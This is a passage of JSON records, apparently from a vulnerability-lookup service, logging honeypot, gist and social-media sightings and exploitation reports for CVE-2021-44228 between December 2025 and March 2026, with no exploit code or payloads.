(2025-12-08)", "content": "", "creation_timestamp": "2025-12-08T00:00:00.000000Z"}, {"uuid": "50fa9e4d-ae05-4d77-88d5-d632fbafab94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/semo970921/b7900f5845408aca8633df26a5a0059b", "content": "", "creation_timestamp": "2026-02-06T06:51:25.000000Z"}, {"uuid": "c24c0b50-32f7-44b0-aa97-841bf09010b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-12-11)", "content": "", "creation_timestamp": "2025-12-11T00:00:00.000000Z"}, {"uuid": "4629e0bb-c24d-43cf-aeba-5c65fe5951cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-10)", "content": "", "creation_timestamp": "2025-12-10T00:00:00.000000Z"}, {"uuid": "7172f0ea-f9a6-44ce-b0fc-cb7c1f15396b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/blackhatnews.tokyo/post/3medz64kaux2z", "content": "", "creation_timestamp": "2026-02-08T13:13:02.075568Z"}, {"uuid": "95d0a7d4-fb19-44eb-bf5f-110058e4fc10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-11)", "content": "", "creation_timestamp": "2025-12-11T00:00:00.000000Z"}, {"uuid": "7fb66d6d-22a0-4cc7-b495-82a63b7f9814", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/fierymind/a7a0534d270360aa3805aceeaa4e4b62", "content": "", "creation_timestamp": "2026-02-14T22:52:24.000000Z"}, {"uuid": "0e10d75d-69d6-457e-9dd3-cb582201b319", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-15)", "content": "", "creation_timestamp": "2026-02-15T00:00:00.000000Z"}, {"uuid": "49e82f4c-b0ee-4048-9025-08bc29be31dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/aw-junaid/ed30afd1f8d04325e68a70aa2e002932", "content": "", "creation_timestamp": "2026-01-30T19:25:35.000000Z"}, {"uuid": "216fa8b8-3ea9-4304-9a4f-386cd976296e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-12)", "content": "", "creation_timestamp": "2025-12-12T00:00:00.000000Z"}, {"uuid": "4a0d9b38-af75-4fcf-bd54-e17473c1e163", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-13)", "content": "", "creation_timestamp": "2025-12-13T00:00:00.000000Z"}, {"uuid": "c26ac4f4-da1e-4bc9-89c7-75c1fc36b1c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-14)", "content": "", "creation_timestamp": "2025-12-14T00:00:00.000000Z"}, {"uuid": "908cc60e-71eb-4e4f-8951-8d3708acaed0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mfriwscuxw2q", "content": "", "creation_timestamp": "2026-02-26T15:25:05.266400Z"}, {"uuid": "8186f9a1-3dd0-42ba-a6b2-d3a9155c7cc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/aw-junaid/570136d2d565f609378c26e32014e52e", "content": "", "creation_timestamp": "2026-02-13T15:20:11.000000Z"}, {"uuid": "b2a2457d-8ea8-4f8e-ae29-d9842ad5a83f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-17)", "content": "", "creation_timestamp": "2026-02-17T00:00:00.000000Z"}, {"uuid": "f5502010-078d-44fb-b986-fd61ed474f4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mfrkpdf2b427", "content": "", "creation_timestamp": "2026-02-26T15:56:42.067849Z"}, {"uuid": "5580b4da-ad0a-4cbb-83de-7734a49b0ef2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-03)", "content": "", "creation_timestamp": "2026-03-03T00:00:00.000000Z"}, {"uuid": "c5d7aad3-5773-4650-b11c-238489d42613", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-09)", "content": "", "creation_timestamp": "2026-02-09T00:00:00.000000Z"}, {"uuid": "b3c7aa74-e07c-4247-aeb0-b24f5a87d52b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mfavv3rclb2p", "content": "", "creation_timestamp": "2026-02-20T01:01:31.200750Z"}, {"uuid": "281a2fd0-9a33-4e10-ba04-3a1c507e4290", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-15)", "content": "", "creation_timestamp": "2025-12-15T00:00:00.000000Z"}, {"uuid": "d150c94a-d1d1-4b9f-9980-137e0f945679", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mftf7tytca2z", "content": "", "creation_timestamp": "2026-02-27T09:23:53.293657Z"}, {"uuid": "16355ff4-aca1-4ec4-bcc2-15e27b479ac1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mer3lldsor2v", "content": "", "creation_timestamp": "2026-02-13T18:00:58.152612Z"}, {"uuid": "27d9e3bf-b771-458c-9a64-8b98fc3fbcce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-16)", "content": "", "creation_timestamp": "2025-12-16T00:00:00.000000Z"}, {"uuid": "595b18e4-e249-46fc-b222-55b0088d382d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-05)", "content": "", "creation_timestamp": "2026-02-05T00:00:00.000000Z"}, {"uuid": "7d38f019-2561-4e16-95aa-f55ca8f344f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-16)", "content": "", "creation_timestamp": "2026-02-16T00:00:00.000000Z"}, {"uuid": "3318964f-8f64-4da1-a2e1-c87b7507479c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-02)", "content": "", "creation_timestamp": "2026-02-02T00:00:00.000000Z"}, {"uuid": "4345eb72-43f8-491d-9599-d86593fc7856", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-17)", "content": "", "creation_timestamp": "2025-12-17T00:00:00.000000Z"}, {"uuid": "d52e0824-2dbe-4531-b6e1-6962b20b5ff5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-12-18)", "content": "", "creation_timestamp": "2025-12-18T00:00:00.000000Z"}, {"uuid": "080dd220-9181-4c24-b4dc-54956fea3bd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-18)", "content": "", "creation_timestamp": "2025-12-18T00:00:00.000000Z"}, {"uuid": "15f54b5f-338c-4d21-a483-f20e7239864c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-06)", "content": "", "creation_timestamp": "2026-02-06T00:00:00.000000Z"}, {"uuid": "aa008fe9-e1f9-4c37-8f99-a6c0b45d269b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-19)", "content": "", "creation_timestamp": "2025-12-19T00:00:00.000000Z"}, {"uuid": "d845dc10-a9f6-42e2-aead-e5feef1cc28e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-21)", "content": "", "creation_timestamp": "2026-02-21T00:00:00.000000Z"}, {"uuid": "8d841d9e-8294-4b6a-857c-1ab4e1e45bc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-21)", "content": "", "creation_timestamp": "2025-12-21T00:00:00.000000Z"}, {"uuid": "e83a29ef-f641-4e8a-8d6f-d83e6a988dcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/Chelsea486MHz/986be7c621ef53477b917787cf70e0f1", "content": "", "creation_timestamp": "2025-12-22T12:56:13.000000Z"}, {"uuid": "0bcf0e43-1e74-4a33-9237-5c5a25f567cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-22)", "content": "", "creation_timestamp": "2025-12-22T00:00:00.000000Z"}, {"uuid": "f4086a0b-fde9-4a76-a994-c73f33b9b51c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-20)", "content": "", "creation_timestamp": "2025-12-20T00:00:00.000000Z"}, {"uuid": "fbd1df15-9408-4aaa-ad69-26c11ec849f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mankiugxm32i", "content": "", "creation_timestamp": "2025-12-23T10:36:27.460255Z"}, {"uuid": "26eb98fb-ad38-4a27-b6f1-12316d5d8826", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-18)", "content": "", "creation_timestamp": "2026-02-18T00:00:00.000000Z"}, {"uuid": "79c7413f-5462-4bba-965a-bdbab21a8a68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-23)", "content": "", "creation_timestamp": "2025-12-23T00:00:00.000000Z"}, {"uuid": "b21308f8-3c9d-42b0-ad09-31d628ad130a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-12-24)", "content": "", "creation_timestamp": "2025-12-24T00:00:00.000000Z"}, {"uuid": "03dc4106-70fc-41b4-ba95-168bf79f8437", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-24)", "content": "", "creation_timestamp": "2025-12-24T00:00:00.000000Z"}, {"uuid": "885d867b-d762-4697-a9ab-029c4a92813d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-08)", "content": "", "creation_timestamp": "2026-03-08T00:00:00.000000Z"}, {"uuid": "bbcfd843-3a61-49df-8763-f7673a6dc43f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-02)", "content": "", "creation_timestamp": "2026-03-02T00:00:00.000000Z"}, {"uuid": "9c895b88-ca22-4bc4-9ac7-97ed81d9db09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-01)", "content": "", "creation_timestamp": "2026-02-01T00:00:00.000000Z"}, {"uuid": "d14c25eb-943d-418c-aac1-b17fc0be583d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-30)", "content": "", "creation_timestamp": "2026-01-30T00:00:00.000000Z"}, {"uuid": "31de56b4-d7eb-47ce-9d05-981788803604", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-04)", "content": "", "creation_timestamp": "2026-02-04T00:00:00.000000Z"}, {"uuid": "fc7d5a70-618d-4f37-a727-3a748642ecf8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2021-44228", "type": "seen", "source": "https://gist.github.com/jimjrxieb/0ab0ed49229599ffbc1a29e3648fddba", "content": "", "creation_timestamp": "2026-03-06T19:57:19.000000Z"}, {"uuid": "c0dd71a7-4c81-4a6b-99cc-b108b4378f33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-12-25)", "content": "", "creation_timestamp": "2025-12-25T00:00:00.000000Z"}, {"uuid": "88386868-1b44-4a2e-bf4b-fb22f9312198", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-25)", "content": "", "creation_timestamp": "2025-12-25T00:00:00.000000Z"}, {"uuid": "7ab74bf8-6d9b-4854-a9ce-ce82302b5c91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://gist.github.com/getter-io/2ea83ba61fd80dd14226016dbc1fa53b", "content": "", "creation_timestamp": "2025-12-27T16:49:37.000000Z"}, {"uuid": "c9060830-1f21-42a9-90b5-31fcae097bc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-28)", "content": "", "creation_timestamp": "2026-01-28T00:00:00.000000Z"}, {"uuid": "79798846-fd57-405f-a4dd-9806db2f48cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-27)", "content": "", "creation_timestamp": "2025-12-27T00:00:00.000000Z"}, {"uuid": "c50fc508-a416-4967-95f6-9bdb56602ff2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-03)", "content": "", "creation_timestamp": "2026-02-03T00:00:00.000000Z"}, {"uuid": "20c2844b-d735-470d-83c2-1db469d2a3eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-26)", "content": "", "creation_timestamp": "2026-02-26T00:00:00.000000Z"}, {"uuid": "a0586b23-29ed-4d00-bff7-17be40d80d1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-12-29)", "content": "", "creation_timestamp": "2025-12-29T00:00:00.000000Z"}, {"uuid": "75af95b6-cb71-48e0-bb19-02dab6011b27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-26)", "content": "", "creation_timestamp": "2025-12-26T00:00:00.000000Z"}, {"uuid": "f6b57b97-6c76-424d-9780-d41a8de99871", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-24)", "content": "", "creation_timestamp": "2026-02-24T00:00:00.000000Z"}, {"uuid": "647b1ffd-385e-487d-aadf-4bcaf0e9692c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-11)", "content": "", "creation_timestamp": "2026-02-11T00:00:00.000000Z"}, {"uuid": "c5da4234-8cb2-4bcb-99a8-56f4559975e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-06)", "content": "", "creation_timestamp": "2026-03-06T00:00:00.000000Z"}, {"uuid": "1d566212-0446-40d2-8f52-d9507a555513", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-28)", "content": "", "creation_timestamp": "2025-12-28T00:00:00.000000Z"}, {"uuid": "b6e3a2dc-93e4-4c57-8005-124a10c3109b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-08)", "content": "", "creation_timestamp": "2026-02-08T00:00:00.000000Z"}, {"uuid": "decb8d30-7162-4d3e-b4f7-ddb5957f276b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/thecybermind.co/post/3mfs6tz4j3d22", "content": "", "creation_timestamp": "2026-02-26T21:57:13.774737Z"}, {"uuid": "39f73584-ef16-4a01-9277-ac54974ed8f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-29)", "content": "", "creation_timestamp": "2025-12-29T00:00:00.000000Z"}, {"uuid": "80b80be2-955f-420b-8780-dfbe859b01c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-01)", "content": "", "creation_timestamp": "2026-01-01T00:00:00.000000Z"}, {"uuid": "647c1430-7adb-4c41-959b-e59aebe926c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-30)", "content": "", "creation_timestamp": "2025-12-30T00:00:00.000000Z"}, {"uuid": "665b7646-c2ca-4ad4-94e7-561ff7d655de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mftinuhjij2z", "content": "", "creation_timestamp": "2026-02-27T10:25:25.594358Z"}, {"uuid": "fbe6c3a4-737e-4f11-ad61-f3ddcc881f18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-29)", "content": "", "creation_timestamp": "2026-01-29T00:00:00.000000Z"}, {"uuid": "42f0d069-6a85-4868-b4d1-0dfed4466455", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mftkndmnvv24", "content": "", "creation_timestamp": "2026-02-27T11:00:54.308023Z"}, {"uuid": "b0cb7538-44da-44dd-a279-f8d90c58f531", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-31)", "content": "", "creation_timestamp": "2025-12-31T00:00:00.000000Z"}, {"uuid": "8ce13f3b-761a-4df1-bb09-8883d14431ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44227", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mg5nnhenjk27", "content": "", "creation_timestamp": "2026-03-03T11:21:21.621944Z"}, {"uuid": "d6880494-0752-4287-a1ff-0e5e64050796", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-02)", "content": "", "creation_timestamp": "2026-01-02T00:00:00.000000Z"}, {"uuid": "401bf4dd-7c38-4b6f-89df-76d11497c4ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-01)", "content": "", "creation_timestamp": "2026-01-01T00:00:00.000000Z"}, {"uuid": "be11b127-68e9-48ec-9b50-1f696948b88d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mf3ghnocl52x", "content": "", "creation_timestamp": "2026-02-17T20:42:14.903680Z"}, {"uuid": "3d92af67-fe84-4a1f-bcb3-55c0622e7eaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-09)", "content": "", "creation_timestamp": "2026-03-09T00:00:00.000000Z"}, {"uuid": "3f1fb9f2-54c6-4bc3-91eb-7a6323f2d9e4", "vulnerability_lookup_origin": 